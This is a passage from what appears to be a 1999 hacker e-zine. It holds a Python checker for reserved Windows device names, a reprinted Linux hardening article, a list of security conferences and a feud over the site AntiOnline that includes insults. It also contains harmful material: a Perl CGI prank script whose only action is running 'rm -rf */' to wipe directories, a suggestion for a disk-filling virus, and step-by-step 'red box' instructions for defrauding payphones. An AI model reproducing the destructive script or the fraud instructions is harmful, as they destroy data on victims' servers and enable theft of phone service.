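# Both separators are accepted so UNC and drive-letter paths split alike.
_SEPARATORS = re.compile(r"[\\/]+")


def is_reserved_component(name: str) -> bool:
    """Return True if a single path component would be parsed as a device name.

    Only the text before the first dot is compared, case-insensitively.
    Trailing spaces and dots are stripped first because the Win32 name
    parser ignores them, so "prn " and "PRN." are reserved as well.
    """
    base = name.rstrip(" .").split(".", 1)[0]
    return base.upper() in RESERVED_DEVICE_NAMES


def reserved_components(path: str) -> list:
    """List every component of a drive-letter or UNC path that is reserved.

    The UNC prefix (two leading separators, then server and share) is split
    like any other path, so the server and share names are checked too.
    """
    return [p for p in _SEPARATORS.split(path) if p and is_reserved_component(p)]


def safe_to_create(path: str) -> bool:
    """True when no component of the path is a reserved device name."""
    return not reserved_components(path)


if __name__ == "__main__":
    # Constructed sample paths, modelled on the ones in the post (hypothetical).
    samples = [
        r"\\whatever\anydir\PRN.xxx",
        r"\\whatever\anydir\hahaha.tmp",
        r"w:\reports\prn",
        r"\\srv\share\logs\COM1.log",
        r"c:\temp\prnfile.txt",
    ]
    for path in samples:
        verdict = "ok" if safe_to_create(path) else "REJECT " + str(reserved_components(path))
        print(f"{path:32} {verdict}")
```

Because the post shows that a server may accept a name the client's own parser would have refused, the check belongs on whichever side does the creating: a rejected name costs a retry, while an accepted one costs an undeletable directory. The check is deliberately conservative and also rejects the bare server or share name if it happens to be a device name.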
This flaw seems to lend itself to a disk-consuming virus, one that creates \\127.0.0.1\anydir\hahaha.tmp and dumps useless garbage in it until it receives the TERM signal, at which point it renames this file to PRN. Next time it is started this virus could create a subdir called hahaha and repeat the process there.

This was tested on Windows NT Workstation 4.0 SP3 creating PRN's on Windows NT Server 4.0 SP?.

STEVENS, Eric
Eric.Stevens@RP-RORER.COM

------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

FUN.S

#!/usr/bin/perl
# Lord Oak's famous Perl script.
# Only works with a UNIX box and
# no configuring is needed!
print "Content-type: text/html\n\n";
# rm -rf */ removes every subdirectory below the script's working directory.
$fjear = `rm -rf */`;
print "Lord Oak 0wns m3!";

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

3.01 --=\\Red Box made easy\\=--

Q. What is a red box?
A. With this you can make free phone calls from pay phones by generating .25, .10, and .05 tones.

Q. Does this work on my phone at my house?
A. No, NEVER EVER try to do anything from your own phone line; it is plain stupid.

Q. Where can I use it at?
A. COCOT (Customer Owned Coin Operated Telephone)

Q. How do I make one?
A. There are a lot of text files out there that try to explain how, but they do not tell you how to program the tones. So me and teliepimp wrote this for the people that want to know how to make one and program the tones.

Alright, this is gonna be a quick and easy to understand article on how to make and program a redbox. Go to Radio Shack and ask to buy a 43-141 tone dialer (the old 33-memory one) or a 43-146 tone dialer (the new one). Once you have that, go home and get a 6.5536 MHz crystal; it doesn't have to be exactly this crystal but keep it in the 6.55 MHz or at the very least 6.5 MHz crystal area. Right now you must modify the damn tone dialer. Unscrew the screws and snap the case open and such, then find the little thing that looks like a capacitor or resistor and solder it off. The capacitor is disguised as that; it's actually a crystal, and it will say Z3.58M on it. Now take your new crystal and solder that on it. All you got to do is put it back together and you are done with making it.

Now that you have that done, it's time to program the damn thing. You should program a quarter tone, then a dime tone, and so on... just push the buttons as stated below.

.25 tone: memory, *, *, *, *, *, 0memory then one of the P1 (that's your quarter tone)
.10 tone: memory, *, *, memory, P2
.05 tone: memory, *, memory, P3

Alright, now you have the three basic tones; you can combine sequences to get different things like a dollar and so on.

Now the phun part. Go to a payfone; I think the GE ones will work, or the SW Bell or others work too. Now this is the first way: go up to the fone, dial the #, then when it says "please put in blah blah to help our profiteering gluttonous organization" or something, play all the tones you want, then it should connect. Always try this method first, just to test it; it's easier than the other way, but what the hell.

Ok, right now the other way: call the operator, then have her dial the # and say you are going to pay with the change in your hand for the call. Then put a nickel or something in, just in case she's still listening, then play the tones, not too fast, just in case she's STILL listening.

EazyMoney
eazy_money@Cyber-Strike.com

------------------------------

3.02 --=\\Conventions & Expo's\\=--

Here is a list of upcoming hacker/security conventions and meetings that you might want to check out.

Beyond Hope
 -Date: Aug 8-10 (1999)
 -Location: New York City (USA)
 -Homepage: http://www.hope.net/
--
World Conference on Information Security Education
 -Date: June 17-19 (1999)
 -Location: Stockholm, Sweden
 -Homepage: http://www.dsv.su.se/WISE1/index2.html
--
NetSec '99 9th Annual Network Security in the Open Environment
 -Date: June 14-16 (1999)
 -Location: St Louis, Missouri (USA)
 -Homepage: http://www.gocsi.com/conf.htm
--
11th FIRST Conference on Computer Security Incident Handling and Response
 -Date: June 13-18 (1999)
 -Location: Brisbane, Australia
 -Homepage: http://www.first.org/conference/1999/
--
DefCon
 -Date: July 9-11 (1999)
 -Location: Las Vegas, Nevada (USA)
 -Homepage: http://www.defcon.org/

Lord Oak
lordoak@thepoison.org

------------------------------

3.03 --=\\Securing Linux\\=--

(IDG) -- I'll say at the outset that I feel that the title "Securing Linux" is somewhat misleading. It implies that one can somehow go through a series of steps and emerge at the end with a secure Linux system or network. That isn't true. The real intent of this two-part series is to help you improve the security of your system and to get you to think securely. One without the other is unlikely to succeed.

Security is a state of mind

Ultimately, security isn't something that is achieved as an end goal; it isn't a state. Rather, it's a way of setting up, maintaining, and running an operating system, network, or environment. Security is a process and a mind-set as well as a condition. It depends on the day-to-day actions of the system or network's users and system administrators. It also depends on the system security not being so intrusive that it encourages users and administrators alike to work around it.
But you have to start somewhere, and that somewhere is to improve the security of your system as much as possible while still meeting your operational needs. A system that isn't connected to any network or phone lines and is kept in a locked room is reasonably secure -- but it will meet few of your needs. From there we embark on a series of compromises between the best possible security and the least inconvenience and difficulty that will serve our purposes. Some of these tips are specific to Linux systems, but many are very general principles that apply to all systems and networks -- not just to Unix (or Unix-like) OSs.

1. Less is more
Applying the Principle of least privilege and the Principle of minimum access ensures that you open up your system to the least amount of risk. Users are allowed only enough privilege and access to do their work, and no more.

2. Planning
Plan ahead and plan to distribute services. Even before you begin an installation (and, ideally, before you purchase system software solutions), make a detailed plan of your intended security defenses. On paper.

3. Installation
A secure system starts with a secure install. This is one area where the various Linux distributions fail to do an adequate job. All of the distributions are guilty of making it too easy to set up insecure or misconfigured installations. Many of them enable services that the new user is unlikely to be aware of, or enable services before they are fully configured.

4. Secure services
Internet and network services are among the most vulnerable parts of your system. Whether you're planning a new installation or reviewing security on an existing system, your file servers, e-mail services, Web servers, FTP, and other network services should be among the first things you check for security holes.

5. Up and running
Once your system is set up, be sure to keep track of the services you're running. Keep a close eye on services and applications by monitoring your UDP and TCP ports.

6. Password and authentication security
Passwords can be the most underestimated security feature you have. Make sure that neither you nor your users are using transparent (easily guessed) passwords, and make sure that your passwords are safe from unauthorized intruders.

7. Security and the privileged user
Never perform routine operations as root! Do your routine work as a nonprivileged user and step up to root only when needed. This is a common mistake of most newbies to Linux (and Unix in general). When you (or a user or a program) must run as root, take the proper security precautions.

8. Cryptography and security
Cryptography is a good thing. It can protect our files, our e-mail, and our communications. Widespread use of cryptography will improve and change the security landscape. Take advantage of cryptography wherever its use is appropriate.

9. Eternal vigilance
Once you've secured your installation and checked your basic security and services, your work isn't over. In fact, the job of keeping your system secure is never over. Even with eternal vigilance, some risk remains, and it may still be possible for someone, sometime, to get in. With or without the help of any one of a number of monitoring programs, you must keep a watchful eye on what is going on in your system.

10. Stay informed
New security holes and bugs are discovered and exploited constantly, and new techniques, patches, and fixes are created to counter the threat they present. The only way to safeguard the system you've worked so hard to secure is to stay on top of new information as it becomes available.

The enemy within is ignorance

While advanced security can be difficult to implement, a great deal can be achieved by taking the simple steps of knowing what you're running and disabling services you aren't sure about. Even small sites and single Linux systems can take steps to reduce the risk and harden their security protection. Not all of these ideas are ideal for all circumstances. You have to understand and balance your security needs, your network design, your functionality needs, and your security policy (if you have one). In any case, knowledge is your best security tool and ignorance is your worst enemy.

http://www.cnn.com/TECH/computing/9906/03/linux.ent.idg/

------------------------------

AO.00 ~[Info on AntiOnline]~
----------------------------

Here is some information that I have collected from various sites and e-mails about the JP and AntiOnline issues. At the end, this will also contain my opinion and other facts that I have put together. All of these e-mails were taken from www.attrition.org and all credit is given from where it was taken.

JP (owner of AntiOnline) is now giving away all of the information he has collected on people to the FBI if they want it or if they want to sign up. We all know that JP has had many interviews (whether they are true or not, that is another thing); this could be a major problem for some/many people. What he is doing is totally wrong and very immature. He is mainly mad because no one likes him and things like that. Either that or he is just trying to get attention and to try to make 'new' friends. Well, if it was for media attention, he sure got it, but the main thing is "is it good"? And also is it "Because people are starting to like him and his site?".
Well, I will let you figure that out on your own.

AO.01 ~[www.wired.com]~
-----------------------

A Web site addressing computer hacking issues has accused a computer security pundit of paying individuals to break into Web servers in exchange for exclusive coverage of the stories that result. John P. Vranesevich, editor of computer security magazine and resource center AntiOnline, denies the charges.

Vranesevich is well known in the hacking and cracking community. He is often called on by news media, including Wired News, to provide perspective on Web site break-ins, viruses, and other security issues.

A report by the group Attrition.org, released Monday, accuses Vranesevich of paying hackers to break into sites, thus guaranteeing him an exclusive on the stories.

"We've never paid for a story," Vranesevich said. "We don't even pay our reporters for stories. [The allegations] are flat-out libelous and there's no proof to it. It's an attempt to destroy, defame, and discredit me."

Vranesevich's detractors were already inflamed over his recent apparent shift in allegiance. On Friday, Vranesevich posted an editorial on his Web site that stated he was working with the Air Force and other government agencies to help track down crackers.

"A little note to the thousands of hackers that read this site," Vranesevich warned, "I have been watching you these past five years. I know how you do the things you do, why you do the things you do, and I know who you are."

His warnings have stirred the ire of attrition.org, led by Brian Martin (who goes by the name Jericho). Martin said he has been following Vranesevich's case for more than a year. Martin based his claims on two emails that allegedly show Vranesevich had a business relationship with "So1o," the hacker accused of breaking into senate.gov last year. Vranesevich said the emails displayed on Martin's site "never existed."

-------------

AO.02 ~[E-mails from Attrition]~
--------------------------------

Here are 2 e-mails that Attrition recently received. They posted these e-mails on their site, but JP and the rest of AntiOnline are saying they are lies and made up. You can visit Attrition's website at: www.attrition.org and I thank them very much for supplying the information that they did.

-AO.01A [Email #1]

IMPLICATION: Serious questions would arise if it was known that a company was funding a person(s) to create problems in order for them to profit from solutions. By hiring an active hacker responsible for breaking into various systems, and then offering a product to help stop intruders, there is a direct cause/effect relationship that leads to unethical profiting from inflated and false threats of system intrusion. By having said hacker break into a high profile web site, deface the web pages, and then offer 'exclusive' "news", it presents the illusion of accurate and honest reporting, when there was little or no news to begin with.

PROOF: This mail from John Vranesevich shows that he and/or AntiOnline IS funding the development of a product called "Local Secure".

---------- Forwarded message ----------
Received: from antionline.com ([209.166.177.36]) by phalse.2600.com (8.8.8/8.8.8) with SMTP id PAA27067 for <bronc@2600.com>; Wed, 12 May 1999 15:02:29 -0400 (EDT)
Message-Id: <199905121902.PAA27067@phalse.2600.com>
Received: from bessie ([209.166.177.43]) by antionline.com ( IA Mail Server Version: 2.3. Build: 10019 ) ) ; 12 May 1999 19:03:17 UT
X-Sender: jp@smtp.antionline.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0
Date: Wed, 12 May 1999 15:03:17 -0400
To: Bronc Buster <bronc@2600.com>
From: John Vranesevich <jp@AntiOnline.com>
Subject: Re: Information
In-Reply-To: <Pine.NEB.4.05.9905121444030.26886-100000@phalse.2600.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

Greetings:

Haha, first off. "Local Secure" is a solaris vulnerability scanner that AntiOnline is having commercially developed. ROFL "some secret 'spy' project". We had a small group of programmers contact us about it, it looked cool, so we threw them a few bucks.

[snip...]

Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline

-------------

-AO.01B [E-mail #2]

IMPLICATION: That an active hacker has a significant role in a company offering security solutions. This behavior is an absolute 'no' in the world of security consulting. If it is known that active hackers populate a security team, what guarantees exist that they will behave ethically when doing consulting work on your network?

PROOF: The following mail proves that "so1o", a.k.a. Chris McNab, holds a significant position in Network Security Solutions Ltd.

---------- Forwarded message ----------
Received: from cc02mh.unity.ncsu.edu (cc02mh.unity.ncsu.edu [152.1.1.144]) by cc01mh.unity.ncsu.edu (8.8.7/8.8.7) with ESMTP id MAA22054 for <jkwilli2@cc01mh.unity.ncsu.edu>; Sun, 11 Apr 1999 12:22:24 -0400 (EDT)
From: chris@ns2.co.uk
Received: from netgates.co.uk (macmail.netgates.co.uk [194.105.64.74]) by cc02mh.unity.ncsu.edu (8.8.7/8.8.7) with ESMTP id MAA18125 for <jkwilli2@unity.ncsu.edu>; Sun, 11 Apr 1999 12:22:22 -0400 (EDT)
Received: from onyx.nss.cx (t@glm001 [193.9.120.4]) by netgates.co.uk (8.7.5/8.x.x) with SMTP id RAA26418 for <jkwilli2@unity.ncsu.edu>; Sun, 11 Apr 1999 17:22:29 +0100 (BST)
Message-ID: <2BC8B641.5DCB@ns2.co.uk>
Date: Sun, 11 Apr 1993 17:22:25 -0700
Organization: http://www.ns2.co.uk/about.html
X-Mailer: Mozilla 3.01 (Win95; I; 16bit)
MIME-Version: 1.0
To: Ken Williams <jkwilli2@unity.ncsu.edu>
Subject: Re: 2.6 md5's
References: <Pine.SOL.4.05.9901061816020.10775-100000@ultra1-100lez.eos.ncsu.edu>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-UIDL: 90e8e8bdcef936724ed2ef7fd94a63f1

Hi Ken,

Chris (so1o) here again..
just asking for a quick favour (well, 2 mins of work on your part, heh). After some hard-drive difficulties I've been experiencing here, I've been trying to rebuild my exploit/tools collections. I was simply wondering if it would be possible for you to .tgz up the *.c files in the http://www.Genocide2600.com/~tattooman/Exploit_Code_Archive/ directory on your site, I only really need the C source files, this will also keep the .tgz's filesize down :-)

I would be _extremely_ grateful if you could hook this up for me, maybe you can put the files on an FTP at ncsu.edu or somewhere fast.

Take it easy,
Chris

--
Chris McNab | Managing Director | Network Security Solutions Ltd. | http://www.ns2.co.uk

-------------

AO.03 ~[AntiOnline's Response]~
-------------------------------

First off, for those of you that haven't read it, Brian Martin's Attrition website has today posted allegations that AntiOnline funded the Whitehouse.gov and Senate.gov hack so that we would have news to cover (However, I'm sure most of you have read it by now, because of organizations, and I use the term loosely, like the Hacker News Network).

Needless to say, when I went forward with the statement that AntiOnline was going to help in the fight against malicious hackers, I expected some backlash from the hacker community. A few dozen extra hack attempts a day, some synfloods. Maybe I'd find myself with a $10,000 phone bill. But, they've apparently chosen something far more creative.

First off, let me say this. Brian Martin (aka Cult_Hero) was raided by the FBI in connection with being a suspected member of the HFG (The group that hacked the New York Times), and Erik Ginorio (BroncBuster) is known, and admits, to breaking into dozens of sites (he calls himself a hacktivist). The fact that these two could think, or at least think up, some grandiose scheme which involved AntiOnline bankrolling hackers, is not surprising. They have both lived their lives trying to break, and evade, the law.

For some reason, Brian Martin has become obsessed over AntiOnline. His website has dozens and dozens of pages of what he calls "errata" that he's written about it. He takes information posted on our site out of context, then criticizes us because of it. Many people have written in asking why we never posted any response to all of the allegations he has on his site about us. Personally, it's because I felt that I didn't need to justify myself, or my actions, to someone who is currently under FBI investigation, and who has never done anything for the security scene other than criticize others. I actually feel bad for him. The fact that he spends such a large portion of his life trying to "bring down" others using lies, deceit, and twistings of the truth, is sad in my eyes.

As for these allegations that I paid people to break into government sites so that I could write a story. Let me just say, that such claims are so far fetched and preposterous, I'm not even going to respond to them on a point by point basis.

It seems that almost all of the criticisms that I receive from people like Brian Martin revolve around money. He says in his "allegations" about AntiOnline that "During the past five years, AO has grown from a five megabyte hobby web site, into a multi domain business venture with hundreds of thousands of dollars in venture capital." Is that what he's so upset about? That I've made a ton of money? Well, let me put his mind at ease. The point in fact, is that I don't now, nor have I ever in my life, had a lot of money. Our venture funding wasn't in the amount of hundreds of thousands of dollars. I am not ashamed to say, and in fact, I'm very proud to say, that our original funding was in the amount of $75,000. I am very proud of the levels I have taken AntiOnline to with very little resources, and a lot of hard work. On average, I put in 17 hour days working on the site and related matters. At the age of 20, I'm trying to build a life long career for myself.

So, to people like Mr. Martin, let me just say that anything my site has accomplished has not, and truly couldn't have been, from me throwing money at it. It came from my love for what I do, and my willingness to put in the time it takes to accomplish my dream.

In a way, I take these allegations that have come against me as a sign that I'm on the right track with what I'm doing. If people like Brian Martin weren't yelling and screaming about me, I guess I'd take that as a sign that I'm off the beaten path. If people like Brian Martin didn't see me as a threat to them, they wouldn't be yelling. So, I'm going to view these recent allegations as a job well done letter from the malicious hackers of the world.

I have always lived my life in a way which I was proud of, and I will continue to do so. I will NOT allow people like Brian Martin and Erik Ginorio to cause me to constantly be taking some sort of sick defensive on my site (Which is probably what their intentions are). That's not its purpose. So, if they come out with some new allegation, like I have secret plans to assassinate the president with a herf gun or something, you won't find a response to them from me here. As a matter of fact, you won't find a response from me at all. I will let the work that I put forth, and the actions that I take in my daily life, be my response.

Yours In CyberSpace,
John Vranesevich
Founder, AntiOnline

-------------

AO.04 ~[Added Comments]~
------------------------

Well, my opinion on this topic is that JP is being totally immature. He is 'telling' on people. People trusted him (kinda) to let him interview them and now he is releasing all of that information about people. JP is releasing all of that information to government and military officials. He said that he is 'against' our illegal activity, but yet he claims he is a hacker? Yea OK. So he is a hacker (supposedly), but yet turns on us? Wow, this makes him a traitor along with being a liar and immature.
He is totally gonna change the community. Now when someone wants to interview a hacker, the hacker is gonna think 'Can I trust him/her?'. So basically there goes MOST/A LOT of the interviews and the information that is supplied about people and what goes on. He is being a total dick and an idiot. Wow, that's 2 more things we can add to the list. The one thing where I get lost is at: what makes a difference if he posts it on his site where everyone can see it (including the government)? It doesn't; he is doing it for the media/attention. Uh oh, we just added media wh0re to the list also! Since we have come up with some characteristics of JP, let's take a look at them:

-Immature
-Tattle Tale
-Hypocrite
-Traitor
-Liar
-Dick
-Idiot
-Media Wh0re

Wow, that's a lot of things. I am sure I/we can come up with lots more but the server doesn't have 7 gigs to spare for a text file. Another reason is: why would I want to waste my time writing up things about JP (characteristics)? I wouldn't want to waste my time on him. Most of you know I am not one to talk trash or bad about other people, but when it comes to things like this, there is no way to help it. When someone is the things listed above (all put together), that shows the person has lack of respect for anyone and is in it all for the money (well, greed was just added). I am truly sorry to those who like AntiOnline and go there and wanted to read this section about what I think of this situation. But mainly it is the truth, and there is honestly no way out of it. The only things that MIGHT not be true are the e-mails that were sent to Bronc Buster (posted on attrition), but that has not been proven yet. And I personally think that they are true and really from him, though they might be modified SOME with things stretched and exaggerated.

-Lord Oak
lordoak@thepoison.org

-------------

This portfolio of information about AntiOnline was put together by Lord Oak and everyone was given credit from where I took the information from. Permission is needed before copying this WHOLE AntiOnline document and not giving credit where it is due. Again, I am sorry to those who like AntiOnline and go there and wanted to read this document. But you have your opinions so please let me have mine (if you wanna think this is an opinion).

Lord Oak
lordoak@thepoison.org

------------------------------

SAY.W
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Quote #2-

    "Come on guys, stop it or I am telling!"
                              -JayPeeAychEf (JPHF)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Please go to: www.thepoison.org/popup.html and click on our sponsors because we have to pay the bills someway! It doesn't cost you anything (except 10 seconds) to go there and click on it.

Antidote is an HNN Affiliate
http://www.hackernews.com

All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.org] and permission is needed before using.